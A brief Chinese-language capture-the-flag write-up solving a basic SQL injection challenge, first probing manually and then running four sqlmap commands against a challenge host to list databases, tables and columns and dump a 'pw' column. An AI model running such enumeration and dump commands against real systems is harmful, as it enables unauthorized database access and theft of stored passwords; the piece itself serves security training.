姿势
本文涉及的sqlmap的用法可参考:[网络安全]以留言板项目渗透实例带你入门sqlmap
方法一
思路:尝试利用or构造 真
语句,再根据回显做下一步判断
数字型注入无回显:
由于该语句为真,却无回显,故可排除数字型注入
考虑单引号注入:
方法二
使用sqlmap爆数据
爆库名:
python sqlmap.py -u "http://61.147.171.105:53846/?id=1" --dbs
接着爆cyber库的表名:
python sqlmap.py -u "http://61.147.171.105:53846/?id=1" -D cyber --tables
然后爆cyber表的列名:
python sqlmap.py -u "http://61.147.171.105:53846/?id=1" -D cyber -T cyber --columns
最后爆pw列的数据:
python sqlmap.py -u "http://61.147.171.105:53846/?id=1" -D cyber -T cyber -C pw --dump
得到flag
总结
本题考察简单的sql注入,读者可躬身实践。
我是秋说,我们下次见。